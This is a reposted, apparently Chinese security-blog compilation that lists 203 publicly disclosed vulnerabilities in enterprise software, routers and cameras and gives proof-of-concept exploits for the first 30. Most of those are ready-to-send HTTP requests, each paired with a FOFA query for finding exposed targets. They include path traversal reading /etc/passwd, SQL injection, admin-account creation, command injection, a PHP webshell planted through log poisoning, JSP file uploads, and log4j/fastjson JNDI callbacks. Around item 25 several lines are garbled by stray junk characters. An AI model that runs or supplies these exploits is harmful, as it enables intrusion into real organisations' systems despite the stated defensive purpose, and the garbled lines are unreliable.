Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of Publicly Disclosed Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and we hope this article helps with defence. Defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled for publication by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few POCs that are too long are replaced with the placeholder PAYLOAD; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.
Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version available; press F12 and search for a keyword to use it.

Bookmark this article if you find it useful. You can also follow the public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC智能物联综合管理平台 arbitrary file read
21. 大华ICC智能物联综合管理平台 random remote code execution
22. 大华ICC智能物联综合管理平台 log4j remote code execution
23. 大华ICC智能物联综合管理平台 fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud 政府财务云 arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空社会化商业 ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 privilege bypass
66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园服务管理平台 service.action remote command execution
77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
79. BYTEVALUE 百为流控路由器 remote command execution
80. 速达天耀软件 DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御安全网关 aaa_local_web_preview file upload
88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
89. 致远互联FE协作办公平台 editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
92. 海康威视运行管理中心 session command execution
93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600防火墙 obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视高清智能录播系统 busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研工程质量检测系统 arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康NS-ASG应用安全网关 index.php SQL injection
135. 网康NS-ASG应用安全网关 list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅通信指挥调度平台 down_file.php SQL injection
138. 福建科立讯通信指挥调度平台 pwd_update.php SQL injection
139. 福建科立讯通信指挥调度平台 editemedia.php SQL injection
140. 福建科立讯通信指挥调度平台 get_extension_yl.php SQL injection
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔消防救援作战调度平台 SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信票务管理平台 SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6车载定位监控平台 SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. 电信网关配置管理系统 rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C校园网自助服务系统 flexfileupload arbitrary file upload
179. 建文工程管理系统 arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼应用虚拟化系统 SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会视频会议 attachment arbitrary file read
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
190. 短视频矩阵营销系统 poihuoqu arbitrary file read
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
196. 河南省风速科技统一认证平台 password reset
197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS海洋影视管理系统 dmku SQL injection
201. 方正全媒体新闻采编系统 binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA:icon_hash="-1344736688"
After logging in to the admin panel with the default account admin, send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the injected code executes a command supplied in base64.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the test target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice医微云 SQL injection
FOFA:title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 (Dahua) DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 (Dahua) DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC智能物联综合管理平台 arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC智能物联综合管理平台 random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC智能物联综合管理平台 log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC智能物联综合管理平台 fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

& J+ d7 `7 O; X/ X4 ?/ X25. 用友NC registerServlet JNDI 远程代码执行
5 G9 p/ U$ d( F0 C# |# [FOFA:app="用友-UFIDA-NC"
0 A$ f5 w) ?# Q2 xPOST /portal/registerServlet HTTP/1.1: H5 o/ o5 i: ^$ u2 N
Host: your-ip, n; l: c/ I' y" R2 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0+ D* |4 S3 G. d4 K/ d- ]  f' [/ x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
4 h/ t( B9 \; n0 G* C! I% BAccept-Encoding: gzip, deflate
1 T1 _* ~  H+ D2 X$ UAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6% ?6 O$ V& B# J% y' n
Content-Type: application/x-www-form-urlencoded+ N& F1 G# D1 \0 a  D' \

2 w; y; S; M4 Etype=1&dsname=ldap://dnslog- b3 B/ t+ o5 m9 F

% j% D, A9 ?3 ]5 x1 y/ `5 b# m- @: U- Z6 W/ x
% t( d) t* v" z. w% h
26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
